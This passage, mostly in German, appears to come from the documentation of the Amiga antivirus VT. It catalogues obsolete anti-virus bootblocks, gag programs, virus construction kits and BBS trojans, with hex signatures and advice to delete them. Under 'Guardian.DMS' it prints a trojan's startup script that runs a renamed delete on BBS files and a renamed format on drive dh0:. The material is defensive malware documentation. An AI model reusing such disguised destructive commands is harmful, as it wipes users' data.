  8520.             20564952 55532045 5241534f 52205632  VIRUS ERASOR V2
  8521.             2e332028 56455241 29202d20 57524954 .3 (VERA) - WRIT
  8522.             54454e20 42592042 4f444f20 53544945 TEN BY BODO STIE
  8523.             474d414e 4e203139 38382000 00000000 GMANN 1988 .....
  8524.          Es sollen Veraenderungen im Speicher erkannt werden und
  8525.          BB-Schreibzugriffe abgefangen werden. Das Programm macht
  8526.          NICHTS !!!! selbst, sondern oeffnet verschiedene Requester
  8527.          und ueberlaesst dem Anwender die Entscheidung. Da das
  8528.          Programm sehr alt (1988) ist, ist es natuerlich 1997 nicht
  8529.          mehr brauchbar. Sie sollten es nicht mehr verwenden.
  8530.          VT sollte das Teil im Speicher erkennen.
  8531.  
  8532.       - Vir.Prot.PB.BB (L)
  8533.          Dringende Empfehlung: Sofort Loeschen
  8534.          Soll Viren erkennen. Veraltet
  8535.          Verbogene Vektoren: Cold Cool DoIo
  8536.          68030: Nach Reset GURU
  8537.          Im BB ist nur zu lesen:
  8538.            62726172 79002050 6f776572 426f6f74 brary. PowerBoot
  8539.          Kann sich selbst als BB schreiben !!!!
  8540.          Fordert trackdisk.device nicht !!!
  8541.          Keine Unterscheidung Filesystem !!!!
  8542.  
  8543.       - VIRUS HUNTER  Kicktag $7F300, KickCheckSum $7F307 immer ab $7F300
  8544.          war ein AntiVirusBB fuer KS1.2  Empfehlung heute: sofort loeschen
  8545.          Begruendung:
  8546.             direkte RomEinspruenge
  8547.             jsr $FC06DC, $94(a6)=$FC12FC, schreibt nach $238(a6) dieser
  8548.             Teil wird aber seit KS2.04 genutzt !!!   usw.
  8549.  
  8550.       - Virus-Killer
  8551.             KickMem, KickTag, KickCheckSum
  8552.  
  8553.       - VIRUS SLAYER V1.0     Cool, DoIo, im Speicher immer $7FA00
  8554.          nur KS1.2 da DoIo absolut ROM
  8555.          veraltet, Empfehlung: loeschen
  8556.          Vermehrung: ueber BB
  8557.          Clone 21.01.94: Erzeugt mit TAI10-Inst. (s.o.)
  8558.          Nur ASCII-Text geloescht.
  8559.          Wird weiterhin als VirusSlayer erkannt:
  8560.            2e202e2e 2e202e20 2e2e2e2d 202e2e20 . ... . ...- ..
  8561.            2e2d2e20 2e2e2d20 2e2e2e21 2e2e2e20 .-. ..- ...!...
  8562.            2e2d2d2e 202e2e2e 2e202e2e 202d2e20 .--. .... .. -.
  8563.  
  8564.       - XCOPY2-BB   Empfehlung: Loeschen
  8565.          KS2.04 ja
  8566.          Fordert trackdisk.device NICHT
  8567.          KickTag, KickCheckSum, im Prg. DoIo, Speicherlage mit
  8568.          AllocMem
  8569.          Ablauf:
  8570.          Beim naechsten Reset wird der Bildschirm gruen.
  8571.          NUR wenn Sie beim Bootvorgang BEIDE Maustasten druecken,
  8572.          wird ein normaler BB geschrieben.
  8573.          Fuer mich ist das KEIN Virus, da OHNE das Wollen des Be-
  8574.          nutzers NICHTS passiert und nicht jeder die Tasten-
  8575.          kombination kennt.
  8576.          Namensbegruendung:
  8577.          Am Ende von Block 0  ist XCOPY2 zu lesen. Der Block 1 wird
  8578.          vom BB-Prg nicht benoetigt und mit 0 aufgefuellt.
  8579.  
  8580.       - ZVirusKiller V1.5  BB   KickTag, KickCheckSum, veraltet
  8581.          Empfehlung: loeschen
  8582.          Text: ZViruskiller V 1.5 usw.
  8583.  
  8584.  
  8585.    - harmlose Programme:    ????????
  8586.      ===================
  8587.  
  8588.       - ANTI-Disk-Validator  Laenge: 1848 Bytes
  8589.          in einen Disk-Validator von WB1.3 wurde das Wort ANTI ein-
  8590.          gebaut. Ueber diesen String wird mit bra.s hinweggesprungen.
  8591.          Die zusaetzlichen 8 Bytes werden wieder eingespart durch die
  8592.          Umwandlung von zwei Longs in Short im weiteren Programm.
  8593.          Dieses Programm ist harmlos. Um aber das Durcheinander bei
  8594.          den Disk-Validatoren gering zu halten, empfehle ich:
  8595.             LOESCHEN !!!!!
  8596.          Nachtrag Feb 94: Es ist ein Programm aufgetaucht, das so einen
  8597.           Anti-Disk-Validator schreibt (fragt aber erst nach). Da als
  8598.           Versionsnummer 1.7 angegeben wird, vermute ich, dass dieses
  8599.           Programm schon laenger existiert.
  8600.           Name: Bush    Laenge gepackt:  7696 Bytes
  8601.                       Laenge ungepackt: 13344 Bytes
  8602.           Dieses Programm wird in der Beschreibung als SADDAM-Killer
  8603.           vorgestellt.
  8604.  
  8605.       - PowerUp  ein GagPrg.  Laenge: 800 Bytes      KEIN Virus !!!!!!
  8606.          keine verbogenen Vektoren. Kein Schreibzugriff
  8607.          Empfehlung: loeschen
  8608.          Ablauf:
  8609.          - nach dem Start wird ein PrgTeil decodiert mit eori.b #$AB,(a0)+
  8610.          - in der shell erfolgt die Ausgabe:
  8611.                  PowerUp ist installiert. Viel Spaß!!!
  8612.          - promptzeichen kommt NICHT
  8613.          - 1. Zeitschleife (dosDelay) laeuft an.
  8614.          - Ausgabe ueber AutoRequest
  8615.                  Achtung!
  8616.                  PowerUp wurde entfernt, da der
  8617.                  Rechner zu heiß wurde.
  8618.                  Neue Installation erst nach Abkühlung der
  8619.                  Logik-Chips möglich!
  8620.                   Oh, schade                  Oh, schade
  8621.          - Nach Mausklick immer noch kein prompt
  8622.          - 2. Zeitschleife laeuft an
  8623.          - DisplayAlert
  8624.                     A P R I L , A P R I L !!!
  8625.          - Nach Mausklick erscheint Prompt-Zeichen
  8626.  
  8627.    - schaedliche Programme:
  8628.      ======================
  8629.  
  8630.       - AcidInfector v1.5   File
  8631.          Loeschen           Laenge gepackt:   1076 Bytes
  8632.                             Laenge ungepackt: 1384 Bytes
  8633.          Fordert zur Installierung von BB-Viren auf.
  8634.            68652041 6369642d 496e6665 63746f72 he Acid-Infector
  8635.            20762031 2e350a0a 0d496e73 65727420  v 1.5...Insert
  8636.            6469736b 20746f20 62652069 6e666563 disk to be infec
  8637.            7465642c 20616e64 20707265 73732052 ted, and press R
  8638.            65747572 6e3a0a0d 4572726f 72202d76 eturn:..Error -v
  8639.            69727573 6e616d65 20646f65 73206e6f irusname does no
  8640.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8641.          Sie bitte das File, bevor Sie es loeschen.
  8642.  
  8643.       - AmiExpress 3.20 Fake    (17.01.94)
  8644.          Wird von VT NICHT erkannt !!!!!
  8645.          Soll mehrere Backdoors enthalten (Fremdaussage NICHT nachge-
  8646.          prueft !!! ). Fuer Nicht-Mailboxbetreiber ungefaehrlich. Und
  8647.          fuer die Mailboxbetreiber auch nur falls sie die Raubkopie
  8648.          installieren !!!
  8649.          Filename:  ACP        45612 Bytes
  8650.                     acp.info    1182 Bytes
  8651.                     Express   212356 Bytes
  8652.  
  8653.       - BootblockMassacre    gepackt: 9592     
  8654.             20202020 20202070 72657365 6e742069        present i
  8655.             6e203139 3838203a 201b5b31 6d544845 n 1988 : .[1mTHE
  8656.             20424f4f 54424c4f 434b204d 41535341  BOOTBLOCK MASSA
  8657.             43524520 1b5b306d 0a202020 20202020 CRE .[0m.......
  8658.          Bietet install von verschiedenen alten BB-Viren   (1988)
  8659.          Bietet install von TimeBomb V0.9 (Files) s.o.
  8660.  
  8661.       - BootShop         Defjam:    108008
  8662.                          MasterCr:   67892
  8663.                          TetraPack:  74036
  8664.          Dringende Empfehlung: Loeschen
  8665.          Erlaubt das Installieren von ueber 40 BB-Viren
  8666.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8667.          Sie bitte das File, bevor Sie es loeschen.
  8668.  
  8669.       - BootShop.unp?   Loeschen
  8670.          Jemand hat sich die Muehe gemacht und das BootShop-Prg ent-
  8671.          packt. Da absolut an eine Speicherstelle entpackt wird, ent-
  8672.          steht ein DATA-File, das NICHT zu starten ist !!! Sie sehen
  8673.          weder $3F3 noch $3E9 .
  8674.          Also kann dadurch KEIN BB verseucht werden.
  8675.          Sie erkennen eine Anzahl von Viren-BBen.
  8676.          Loeschen Sie das File.
  8677.  
  8678.  
  8679.       - BootX5.02   gibt es noch gar nicht (Stand:26.06.92)
  8680.          Jemand mit Filemonitorkenntnis hat mehrmals das Wort Porky
  8681.          eingebaut. Sofort loeschen
  8682.  
  8683.       - ByteWarriorCreater   gepackt: 6012 Bytes  (TNM)
  8684.                            ungepackt: 7360 Bytes
  8685.          Erzeugt mit Fastmem eine NDOS-Disk
  8686.          Ohne Fastmem wird der ByteWarrior in den Bootblock geschrieben
  8687.  
  8688.       - DAG_Creator     ungepackt: 7000 Bytes oder 7360 Bytes
  8689.             anderer Name: Infector V2.0    gepackt:4956
  8690.             schreibt DAG-Virus in BB von df1:
  8691.          VT sollte die Version mit Laenge 7360 Bytes ungepackt erken-
  8692.          nen.
  8693.  
  8694.       - Disk.info   Laenge: 370 Bytes  KEINE Vermehrung
  8695.          Ein OriginalWB1.3-Icon wurde in der Struktur geaendert. (Text
  8696.          eingebaut z.B. This is a little present for all Lamers
  8697.          abroad ). Sobald Sie diese Disk einlegen und es muesste das
  8698.          Disk-Icon auf der WB angezeigt werden, stuerzt der Rechner
  8699.          ab. Haben Sie die Startup-Sequence im Cli abgebrochen, so
  8700.          muss kein Icon dargestellt werden und deshalb koennen Sie
  8701.          mit dieser Disk ohne Probleme arbeiten. Abhilfe: Ersetzen
  8702.          Sie Disk.info .
  8703.  
  8704.       - DiskRepair V2.6     Laenge:37740
  8705.          Schreibt nach dem ersten Scandurchgang einen LEEREN RootBlock
  8706.          mit Namen PHOENIX . Beim 2. Durchgang werden aber dann die
  8707.          Files wieder eingetragen.  ABER  !!!!!
  8708.          es wird immer ein nicht ausfuehrbarer BootBlock geschrieben ???
  8709.          Der Fehler liegt nach meiner Meinung im File bei $80d0 . Ich
  8710.          rate also von diesem Prg. ab !!!
  8711.  
  8712.       - DM-Trash     06.08.92      s.o. ZAPA_B.Door
  8713.              gegen AmiExpress ???
  8714.          dm-tr.lha 5135 Bytes  entpackt: dm-trash 4764 Bytes
  8715.          folgender Text (doc) ist enthalten:
  8716.          New virus ...caused by the new FIXED (?) Version
  8717.          of DMS 1.11 Turbo!
  8718.          It is some kind of linkvirus and uses Devices
  8719.          like DH0:, LIBS:, and BBS: (!!) usw.
  8720.  
  8721.          Eigene Versuche mit FangFiles (habe AmiExpress nicht) haben
  8722.          ergeben, dass eben von dm-trash folgende Files veraendert wer-
  8723.          den:  bbs:config1  bbs:user.data  bbs:user.key 
  8724.          Die Files wurden verlaengert.
  8725.          dm-trash. Vermutlich soll ein Superlevel fuer einen Boxzu-
  8726.          gang geschaffen werden. Also fuer normale Amiga-User kein
  8727.          Problem.
  8728.  
  8729.       - Guardian.DMS  sofort loeschen
  8730.          Nach dem Entpacken auf Disk entsteht guardian.config,
  8731.          startup-sequence und andere Files.
  8732.          Gefaehrlich:
  8733.  
  8734.          guardian.config
  8735.          v1.0 dh0:bbs/
  8736.          v1.0 dh1:bbs/
  8737.          2
  8738.             - v1.0 ist in c auf der Disk ein umbenannter delete-Befehl
  8739.  
  8740.          startup-sequence
  8741.          echo " "
  8742.          echo "      GUARDIAN MULTITOOL INSTALL      "
  8743.          echo " "
  8744.          echo "Please wait"
  8745.          v1.0 dh0:bbs/user.data
  8746.          v1.0 dh0:bbs/user.keys
  8747.          v1.0 dh0:bbs/config1
  8748.          v1.0 dh0:s/startup-sequence
  8749.          check drive dh0: Name Guardian-Multi
  8750.          wait 3
  8751.          echo " "
  8752.          echo "Operation complete "
  8753.             - check ist in c auf der Disk ein umbenannter format-Befehl
  8754.  
  8755.       - Infect     Laenge ungepackt: 1384
  8756.          schreibt File (z.B. BB) in BB eines LW's DFx
  8757.          kann sowohl positiv als auch negativ genutzt werden
  8758.  
  8759.       - Infector V2.0   = DAG_Creator  s.o.
  8760.  
  8761.       - Keeper V2.0   gepackt: 34272 Bytes
  8762.          Hat einige Viren zum installieren FEST eingebaut.
  8763.  
  8764.       - Lhwarp_V1.40   Laenge: 47880 Bytes (ungepackt)
  8765.                Hinweis eines Users: mit Impl: 24788, mit PP: 27828
  8766.          Schreibt bei mir auf Zieldisk, falsche DiskStruktur beim Entpacken.
  8767.          Disk dann unbrauchbar. Bitte fuehren Sie aber mit unwichtigen
  8768.          Disks selbst Tests durch und testen Sie mit BlockKette.
  8769.  
  8770.       - LZ 2.0             Hinweis: Stand 21.09.91
  8771.          In Boxen ist ein LZ2.0 aufgetaucht, mit Laenge 37380 Bytes
  8772.          entpackt. Muss sich um einen Patch handeln und soll Archive
  8773.          zerstoeren. Hab ich, wird aber von VT nicht erkannt.
  8774.          Die hoechste OriginalVersionsNummer von LZ war am 22.09.91
  8775.          LZ 1.92 .
  8776.  
  8777.       - Show Sysops Util  06.08.92
  8778.          Laenge: 5780   entpackt: 7860
  8779.          Sucht nach BBS:USER.DATA und gibt Daten am Bildschirm aus.
  8780.          An einem FangFile konnten keine Veraenderungen festge-
  8781.          stellt werden. Dies kann aber bei einem Mailboxprg. anders
  8782.          sein. Fuer normale Amiga User nach meiner Meinung keine
  8783.          Gefahr und Sysops wissen sich zu helfen oder ??
  8784.  
  8785.       - uinfo        Laenge:13048   wird von VT  NICHT  erkannt
  8786.          Sucht nach AEDoorPort (AmiExpress ???) und Userdaten.
  8787.          Also fuer NormalUser ohne MailBox keine Gefahr.
  8788.          10.09.92
  8789.  
  8790.       - Virusconstructionset       Laenge gepackt (PP2): 10192 Bytes
  8791.          Sie werden aufgefordert, einen max 60 Zeichen langen Display-
  8792.          Alert-Text einzugeben. Den erzeugten BB koennen Sie dann auf
  8793.          Disk in DF0: abspeichern. 
  8794.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8795.          Sie bitte das File, bevor Sie es loeschen.
  8796.  
  8797.       - VirusConstructionSet 2       Laenge gepackt (PP3): 32360 Bytes
  8798.                                             entpackt     : 47944 Bytes
  8799.          Sie werden aufgefordert, einen max 60 Zeichen langen Display-
  8800.          Alert-Text einzugeben. Weitehin koennen Sie den Virusnamen
  8801.          festlegen, der dann immer im BB sichtbar ist. Mit F1 oder F2
  8802.          legen Sie fest, ob der BB codiert abgespeichert wird.
  8803.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8804.          Sie bitte das File, bevor Sie es loeschen.
  8805.  
  8806.       - Virusmaker V1.0              Laenge gepackt (PP): 15641 Bytes
  8807.                                             entpackt    : 84216 Bytes
  8808.          erzeugt nach Wahl: Byte Bandit, Byte Warrior, S.C.A., North-
  8809.          Star 1+2, System Z
  8810.          Dringende Empfehlung: Loeschen
  8811.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8812.          Sie bitte das File, bevor Sie es loeschen.
  8813.  
  8814.       - X-Ripper V1.1     Laenge: 41360 Bytes (ungepackt)
  8815.          erlaubt mit inst 5 das Schreiben eines Lamer-BBs. Es wird
  8816.          aber eine NDos-Disk daraus, weil die DOS0-Kennung um 8 Bytes
  8817.          verschoben angelegt wird.
  8818.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8819.          Sie bitte das File, bevor Sie es loeschen.
  8820.  
  8821.       Programme gegen BBS, die ich nicht besitze. Bitte zusenden. Danke
  8822.  
  8823. /      ---> Date And Time Uploaded -- Mon 01-Feb-93  2:34:10 PM <---        \
  8824. -----------------------------------------------------------------------------
  8825.  WARNING ! DO NEVER RUN THE FILE "KILLKIM.EXE" ON YOUR BBS COMPUTER !!!
  8826. IT LOOKS FOR THE USER.DATA,USER.KEYS, STARTUP-SEQUENCE & EXPRESS MAINFILE
  8827. AND FILLS THEM WITH THE FOLLOWING TEXT:
  8828.  
  8829. --------------CUT HERE------------------
  8830. STARTUP-SEQUENCE SUCCESSFUL DESTROYED!!! 
  8831. --------------CUT HERE------------------
  8832.  
  8833.  
  8834. --------------CUT HERE-----------------
  8835. USER.KEYS SUCCESSFUL DESTROYED !!! 
  8836. --------------CUT HERE-----------------
  8837.  
  8838.  
  8839. AND SO ON. THEN IT RUNS AN APPENDED LSD INTRO. 
  8840. TO THE LAMER WHO 'CODED'[IT WAS COMPILED AREXX] THAT STUFF:LOOKS PRETTY LAME
  8841. IF THERE'S A REQUESTER ON SCREEN "PLEASE INSERT VOLUME BBS: IN ANY DRIVE"...
  8842. I WOULD AT LEAST CHECK IF BBS: ACTUALLY EXISTS ! 
  8843.                                                       CYCLONE/DUAL CREW
  8844.  
  8845.  
  8846. /      ---> Date And Time Uploaded -- Sun 31-Jan-93  1:31:54 PM <---        \
  8847. -----------------------------------------------------------------------------
  8848.  -------------------------------------------------------------------------
  8849.    WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! WARNING !
  8850.  -------------------------------------------------------------------------
  8851.   THE FILES JISMTRO.EXE IS A TROJAN ! IT CREATES A FILE IN AREA 2 UPLOAD
  8852.             DIR WITH THE NAME TSL-BBS.EXE !!!! DO NOT RUN IT !
  8853.  -------------------------------------------------------------------------
  8854.  
  8855. Maerz 93:
  8856.  
  8857. WARNiNG!
  8858.  
  8859. A File Named 'TRSITW.EXE' Was Spread Some Days Ago, Labeled As A
  8860. New TRSI Intro  - This Is A Damn FAKE! And Even Worse It Has A
  8861. BackDoor In It Which Tries To Open The File 'DH0:BBS/USER.DATA' !
  8862. After That It Looks For A User Called 'EASY-E' And Sets (If Existing)
  8863. His UserLevel To 255 !
  8864.  
  8865. Whoever This Little Creep May Be : Give Him A Kick If Ya' Know Him !
  8866.  
  8867.   ------------------------------------------------------------------------
  8868.  
  8869. April 93:
  8870.  
  8871.  Es ist ein Gfa-Basic-Programm aufgetaucht, das angeblich verschiedene
  8872.  Link-Viren erzeugt.
  8873.    VCS         Laenge PP-crunched: 30276
  8874.    VCS.info    Laenge: 459
  8875.    VCS.data    Laenge: 23632
  8876.    VCS1.data   Laenge: 12536
  8877.  
  8878.  Nach IHRER muehevollen, aber leider vergeblichen Arbeit, wird auf der
  8879.  Disk in df0 ein File mit Namen Tasten-Text erzeugt.
  8880.  
  8881.         Hallo Virustown !
  8882.                          
  8883.         Es ist Sommerzeit und der 1.April 
  8884.  
  8885.  
  8886.        Aber vielleicht ist ja doch ein Virus da ?
  8887.               SCHAU DOCH MAL IN DER UHR NACH ?!!?
  8888.                                                  
  8889.               Hier  ne Tastenkombination:
  8890.               linke Hand: alt,ctrl,q,4,v
  8891.               rechte Hand: Enter,8,Alt,Help,ü
  8892.               Nase: F6
  8893.               Zunge: z
  8894.  
  8895.  Ich finde den "GAG" nicht so stark und denke die erste geloeschte
  8896.  Festplatte, laesst diesen Programmierer mit seiner SINNLOSEN Arbeit,
  8897.  anders denken.
  8898.  
  8899.  --------------------------------------------------------------------------
  8900.  
  8901.    Heiner
  8902.  
  8903.   Amiga ist ein eingetragenes Warenzeichen von Gateway 2000
  8904.  
  8905.